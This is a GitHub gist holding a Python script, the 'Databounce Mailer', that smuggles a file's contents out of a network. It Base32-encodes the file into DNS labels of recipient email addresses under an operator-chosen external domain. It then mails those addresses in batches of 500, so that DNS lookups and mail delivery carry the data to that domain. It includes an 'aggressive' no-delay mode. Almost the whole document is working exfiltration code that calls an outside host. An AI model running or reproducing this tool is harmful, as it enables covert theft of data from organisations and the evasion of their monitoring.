Created
November 14, 2024 14:27
-
-
Save yosignals/dce98eea85f8032afa0106e6ad6ad95e to your computer and use it in GitHub Desktop.
Databounce Mailer - 500 'recipients per email'
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64 | |
import smtplib | |
import time | |
import argparse | |
import dns.resolver | |
from email.mime.text import MIMEText | |
from email.mime.multipart import MIMEMultipart | |
# --- Chunking and batching ---
# Number of raw bytes taken from the input file for each chunk.
CHUNK_SIZE = 63
# Upper bound on the number of recipient addresses handled per email.
RECIPIENTS_PER_EMAIL = 500
# Default pause, in seconds, between consecutive batches.
FREQUENCY_DELAY = 10

# --- SMTP connection ---
# Set USE_SSL to True (and SMTP_PORT to 465) when the server uses SSL on port 465.
USE_SSL = False
SMTP_PORT = 587
SMTP_USER = '[email protected]'
SMTP_PASSWORD = 'your_password'
def encode_file_in_base32_chunks(filepath, chunk_size=None):
    """Read a file and return its contents as unpadded Base32 strings.

    The file is split into fixed-size byte chunks and each chunk is
    Base32-encoded with the trailing ``=`` padding removed.  Every returned
    string is at most 40 characters long.

    Base32 turns every 5 input bytes into 8 output characters, so 25 bytes
    is the most that fits in 40 characters.  The raw chunk size is therefore
    capped at 25 bytes; capping the input (rather than slicing the encoded
    text) keeps every byte of the file in the output.

    Args:
        filepath: Path of the file to read; it is opened in binary mode.
        chunk_size: Requested raw bytes per chunk.  Defaults to the
            module-level ``CHUNK_SIZE``.  Values above 25 are reduced to 25.

    Returns:
        A list of Base32 strings, one per chunk, in file order.  An empty
        file yields an empty list.

    Raises:
        ValueError: If the requested chunk size is smaller than 1.
    """
    max_encoded_chars = 40
    max_raw_bytes = max_encoded_chars * 5 // 8  # 25 bytes -> exactly 40 chars

    if chunk_size is None:
        chunk_size = CHUNK_SIZE
    if chunk_size < 1:
        raise ValueError(f"chunk size must be at least 1, got {chunk_size}")
    step = min(chunk_size, max_raw_bytes)

    with open(filepath, 'rb') as file:
        data = file.read()

    return [
        base64.b32encode(data[start:start + step]).decode('ascii').rstrip('=')
        for start in range(0, len(data), step)
    ]
def format_email_address(chunk_number, total_chunks, encoded_chunk, external_domain):
    """Build the recipient address that carries one encoded chunk.

    The host part has the form
    ``<chunk_number>of<total_chunks>.<encoded_chunk>.<external_domain>`` and
    the local part is always ``boop``.

    Args:
        chunk_number: Position of this chunk in the sequence.
        total_chunks: Total number of chunks in the sequence.
        encoded_chunk: Encoded text placed in its own label.
        external_domain: Domain appended after the chunk label.

    Returns:
        The address string ``boop@<host>``.

    Raises:
        ValueError: If any dot-separated label of the host is longer than 63
            characters, or the host as a whole is longer than 253 characters.
    """
    max_label_len = 63
    max_host_len = 253

    sequence_label = f"{chunk_number}of{total_chunks}"
    full_subdomain = f"{sequence_label}.{encoded_chunk}.{external_domain}"

    # str.split always yields at least one piece, so max() is safe here.
    longest_label = max(len(piece) for piece in full_subdomain.split('.'))
    if longest_label > max_label_len or len(full_subdomain) > max_host_len:
        raise ValueError(f"DNS label or domain too long: {full_subdomain}")

    return "boop@" + full_subdomain
def prepare_recipients(encoded_chunks, external_domain):
    """Turn a sequence of encoded chunks into recipient addresses.

    Chunks are numbered from 1 in the order given, and each address is
    produced by ``format_email_address``.

    Args:
        encoded_chunks: Sequence of encoded chunk strings.
        external_domain: Domain passed through to ``format_email_address``.

    Returns:
        A list with one address per chunk, in the same order.
    """
    chunk_count = len(encoded_chunks)
    addresses = []
    for position, chunk in enumerate(encoded_chunks, start=1):
        addresses.append(
            format_email_address(position, chunk_count, chunk, external_domain)
        )
    return addresses
def resolve_full_subdomain(full_subdomain):
    """Report whether an A-record lookup for ``full_subdomain`` succeeds.

    The lookup uses a resolver that ignores the system configuration, has
    caching disabled, and queries the name servers 8.8.8.8 and 8.8.4.4.
    A status line is printed for every outcome.

    Args:
        full_subdomain: Host name to look up.

    Returns:
        True when the lookup returns without raising; False on NXDOMAIN, on
        an empty answer, or on any other exception.
    """
    resolved = False
    try:
        lookup = dns.resolver.Resolver(configure=False)
        lookup.nameservers = ['8.8.8.8', '8.8.4.4']
        lookup.cache = None  # no caching, so every call performs a fresh query
        lookup.resolve(full_subdomain, 'A')
        print(f"Subdomain {full_subdomain} resolved successfully.")
        resolved = True
    except dns.resolver.NXDOMAIN:
        print(f"Subdomain {full_subdomain} does not exist.")
    except dns.resolver.NoAnswer:
        print(f"No answer for subdomain {full_subdomain}.")
    except Exception as exc:
        # Best-effort check: any other failure is reported and treated as unresolved.
        print(f"Failed to resolve {full_subdomain}: {exc}")
    return resolved
def send_emails_in_batches(recipients, smtp_server, aggressive, delay):
    """Send one email per batch of recipients whose host part resolves.

    Recipients are processed in slices of ``RECIPIENTS_PER_EMAIL``.  Within
    each slice only the addresses whose host part passes
    ``resolve_full_subdomain`` are kept; a slice with no such address sends
    nothing.  A progress line is printed for every email sent.

    Args:
        recipients: List of addresses of the form ``local@host``.
        smtp_server: Host name of the SMTP server to connect to.
        aggressive: When true, do not pause between batches.
        delay: Seconds to sleep between batches when ``aggressive`` is false.
    """
    if not recipients:
        # Nothing to send, so do not open an SMTP connection at all.
        return

    total_recipients = len(recipients)
    # Ceiling division: a partial final slice still counts as a batch.
    total_batches = (total_recipients + RECIPIENTS_PER_EMAIL - 1) // RECIPIENTS_PER_EMAIL

    smtp_class = smtplib.SMTP_SSL if USE_SSL else smtplib.SMTP
    with smtp_class(smtp_server, SMTP_PORT) as server:
        if not USE_SSL and SMTP_PORT == 587:
            server.starttls()  # Upgrade to TLS only for a plain connection on port 587

        # Authentication is currently disabled; enable the next line if the
        # server requires a login.
        # server.login(SMTP_USER, SMTP_PASSWORD)

        for batch_num in range(total_batches):
            start = batch_num * RECIPIENTS_PER_EMAIL
            candidates = recipients[start:start + RECIPIENTS_PER_EMAIL]
            # Keep only the addresses whose host part resolves.
            batch_recipients = [
                recipient for recipient in candidates
                if resolve_full_subdomain(recipient.split('@')[1])
            ]

            if batch_recipients:
                msg = MIMEMultipart()
                msg['From'] = SMTP_USER
                msg['Subject'] = "Data Transmission"
                # Assigning msg['To'] repeatedly appends a new header each
                # time, so build a single comma-separated To header instead.
                msg['To'] = ', '.join(batch_recipients)
                msg.attach(MIMEText("Placeholder text - actual data attached in email address"))

                server.sendmail(SMTP_USER, batch_recipients, msg.as_string())
                print(f"Batch {batch_num + 1}/{total_batches} sent to {len(batch_recipients)} recipients.")

            # The pause separates batches, so it is skipped after the last one.
            is_last_batch = batch_num == total_batches - 1
            if not aggressive and not is_last_batch:
                time.sleep(delay)
def send_encoded_file(filepath, external_domain, aggressive=False, delay=FREQUENCY_DELAY):
    """Encode a file, build the recipient list, and send it in batches.

    The SMTP host is ``smtp.`` followed by ``external_domain`` with its
    left-most label removed.

    Args:
        filepath: Path of the file to encode.
        external_domain: Domain used in the recipient addresses; it must
            contain at least one dot.
        aggressive: Passed through to ``send_emails_in_batches``.
        delay: Passed through to ``send_emails_in_batches``.
    """
    # Everything after the first dot of external_domain is the parent domain.
    parent_domain = external_domain.split('.', 1)[1]
    smtp_server = "smtp." + parent_domain

    recipients = prepare_recipients(
        encode_file_in_base32_chunks(filepath),
        external_domain,
    )
    print(f"Prepared {len(recipients)} recipient addresses.")

    send_emails_in_batches(recipients, smtp_server, aggressive=aggressive, delay=delay)
if __name__ == '__main__':
    # Command-line entry point: parse the arguments, then hand off to send_encoded_file.
    cli = argparse.ArgumentParser(description="Send a file as encoded data chunks via email.")

    # Positional arguments.
    cli.add_argument('filepath', type=str, help="Path to the file to be sent.")
    cli.add_argument('external_domain', type=str, help="External domain to use in the recipient email addresses.")

    # Optional pacing controls.
    cli.add_argument('--aggressive', action='store_true', help="Send emails without delay between batches.")
    cli.add_argument('--delay', type=int, default=FREQUENCY_DELAY, help="Delay in seconds between email batches.")

    options = cli.parse_args()
    send_encoded_file(
        options.filepath,
        options.external_domain,
        aggressive=options.aggressive,
        delay=options.delay,
    )
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment